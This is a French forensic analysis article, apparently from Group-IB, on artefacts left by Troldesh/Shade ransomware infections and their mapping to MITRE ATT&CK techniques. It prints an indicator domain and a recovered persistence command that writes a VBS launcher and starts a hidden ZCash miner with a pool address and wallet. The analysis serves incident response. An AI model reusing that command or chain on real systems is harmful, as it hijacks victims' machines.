Si vous suivez l'
actualité , vous connaissez probablement une nouvelle attaque à grande échelle contre les sociétés russes du virus roldomware Troldesh (Shade), l'un des cryptolockers les plus populaires parmi les cybercriminels. Rien qu'en juin, Group-IB a découvert plus de 1 100 e-mails de phishing de Troldesh envoyés au nom d'employés de grandes compagnies aériennes, de concessionnaires automobiles et des médias.
Dans cet article, nous examinerons les artefacts médico-légaux qui peuvent être trouvés après une attaque Shade / Troldesh sur les médias d'un appareil compromis, et comparerons également les tactiques et techniques utilisées par les attaquants avec MITRE ATT & CK.
Publié par
Oleg Skulkin , médecin légiste de premier plan au Groupe IB
Troldesh, également connu sous le nom de Shade, XTBL, Trojan.Encoder.858, Da Vinci, No_more_ransome, est un virus qui crypte les fichiers sur le périphérique infecté d'un utilisateur et nécessite une rançon pour restaurer l'accès aux informations. Des campagnes récentes avec Troldesh ont montré que maintenant, non seulement il crypte les fichiers, mais aussi les mineurs de crypto-monnaie et génère du trafic vers des sites Web pour augmenter le trafic et les revenus de la publicité en ligne.
La première fois que l'activité de Troldesh a été détectée par des experts du Groupe IB en 2015, ils ont remarqué que le virus avait réussi à contourner les outils de protection antivirus. Les attaquants ont régulièrement changé le «packer» - un programme de packer qui réduit la taille des fichiers et le rend difficile à détecter et à inverser - pour cette raison, les programmes antivirus l'ont souvent ignoré. À la fin de 2018, Troldesh est devenu l'un des virus les plus populaires et est entré en toute confiance dans le top 3, avec RTM et Pony. Les experts de PaloAlto Networks ont indiqué que Troldesh ne fonctionne pas uniquement à des fins russes - parmi les pays touchés par les ransomwares, on trouve les États-Unis, le Japon, l'Inde, la Thaïlande et le Canada.
Vecteur d'infection initial
En règle générale, «Troldesh / Shade» est distribué via des e-mails de phishing avec des pièces jointes malveillantes, par exemple, des archives protégées par mot de passe contenant des fichiers JS malveillants, après ouverture, le cryptolocker est téléchargé et lancé. Qu'est-ce que cela signifie? Ce serait une bonne idée de commencer notre étude en analysant les traces de l'ouverture de telles archives. Où trouver de telles traces? Eh bien, par exemple, dans les listes de raccourcis:
Données extraites du fichier 5f7b5f1e01b83767.automaticDestinations-ms à l'aide de JLECmd
Ainsi, nous voyons que l'utilisateur a ouvert l'archive avec le nom "mot de passe 11.rar sur la commande". Mais comment est-il entré dans le système? Le fichier se trouve dans le répertoire Téléchargements, très probablement il a été téléchargé depuis Internet. Jetons un coup d'œil à l'historique du navigateur:
Données extraites du fichier WebCache01.dat à l'aide de Belkasoft Evidence Center
Comme vous pouvez le voir, le fichier a été téléchargé à l'aide du navigateur Web Microsoft Edge et enregistré dans le répertoire Téléchargements. De plus, juste avant le téléchargement, l'utilisateur a visité le site Web, donc l'archive a été reçue par e-mail.
Ainsi, nous avons affaire à la technique la plus courante: T1193 - «Attachement de chasse au harpon».
Démarrage et contournement des mécanismes de protection
Si nous regardons à l'intérieur de l'archive, nous trouverons un fichier JS avec un nom presque identique. Pour que le malware se charge et commence à fonctionner, l'utilisateur doit double-cliquer sur le fichier spécifié. Après cela, «wscript.exe» lancera le fichier JS, qui téléchargera le fichier malveillant depuis
mat.tradetoolsfx [.] Com et l'exécutera. Pouvons-nous en trouver des traces sur le disque? Bien sûr!
Examinons le fichier de prélecture wscript.exe, en nous concentrant sur les fichiers avec lesquels il a interagi:
<...>
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ MICROSOFT \ WINDOWS \ INETCACHE \ IE \ OEJ87644 \ 1C [1] .JPG
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ TEMP \ 7ZO84024637 \ DÉTAILS DE LA COMMANDE A.JS
<...>
Nous avons donc deux fichiers intéressants. Premièrement, nous connaissons maintenant le nom du fichier JS qui se trouvait dans l'archive, et deuxièmement, nous avons découvert le nom du fichier qu'il a téléchargé. Il est temps de savoir d'où il a été téléchargé. Jetons à nouveau un œil à WebCache01.dat:
Données extraites de WebCache01.dat à l'aide de ESEDatabaseView
Si nous décodons le contenu du champ ResponseHeaders, nous obtenons ce qui suit:
HTTP / 1.1 200 OK
Type de contenu: image / jpeg
Longueur du contenu: 1300656
ETag: "5ced19b6-13d8b0"
Strict-Transport-Security: max-age = 31536000;
En fait, ce n'est pas un fichier JPG, mais un fichier exécutable qui déchiffre et lance une instance de Shade.
Alors, quelles techniques traitons-nous ici? Script (T1064), exécution utilisateur (T1204) et masquage (T1036).
Broche système
«Shade» utilise une manière plutôt banale de réparer le système - la clé de registre «Software \ Microsoft \ Windows \ CurrentVersion \ Run» (T1060). Nous savons déjà que le fichier JS malveillant a été ouvert par l'utilisateur "0136", alors jetez un œil au fichier correspondant "NTUSER.DAT":
Le mécanisme de verrouillage du système détecté par Belkasoft Evidence Center
Mais ce n’est pas tout! Plus intéressant encore:
Le mécanisme de verrouillage du système détecté par Belkasoft Evidence Center
Comme vous pouvez le voir dans l'illustration, il existe une autre entrée intéressante pointant vers C: \ ProgramData \ SysWOW64 \ leWRX7w.cmd. Voyons ce qu'il y a dans ce fichier:
echo CreateObject ("Wscript.Shell"). Exécutez "" ^ & WScript.Arguments (0) ^ & "", 0, False> "% TEMP% / pxNXSB.vbs" && start / WAIT wscript.exe "% TEMP% /pxNXSB.vbs "" C: \ Users \ 0136 \ AppData \ Roaming \ SOFTWA ~ 1 \ NHEQMI ~ 1.EXE -l eu1-zcash.flypool.org ∗ 333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.7B9D281 &% TEMP% \ pxNXSB.vbs "
Nous avons donc un fichier de plus. À en juger par son contenu, il est utilisé par des attaquants pour exploiter la crypto-monnaie ZCash. Ainsi, même si la victime paie la rançon, les ressources de son système seront toujours utilisées par les intrus.
Les conséquences
Tout d'abord, "Shade" est un cryptoclocker, donc la première chose qui attire votre attention est beaucoup de fichiers avec l'extension "CRYPTED000007", des fichiers "Lisez-moi", ainsi que des fonds d'écran "frais" sur votre bureau:
Un fichier avec cette image se trouve dans le répertoire C: \ Users \% username% \ AppData \ Roaming. De quel équipement traitons-nous? «Données chiffrées pour l'impact» (T1486).
Mais, comme vous l'avez déjà compris, "Shade" n'est pas un casier cryptographique ordinaire. En plus du cryptoclocker lui-même, nous avons également trouvé un mineur, ce qui signifie qu'il vaut la peine de mentionner une autre technique - «Resource Hijacking».
MITRE ATT & CK
Notre analyse a révélé un certain nombre de tactiques et de techniques des distributeurs Shade, résumons: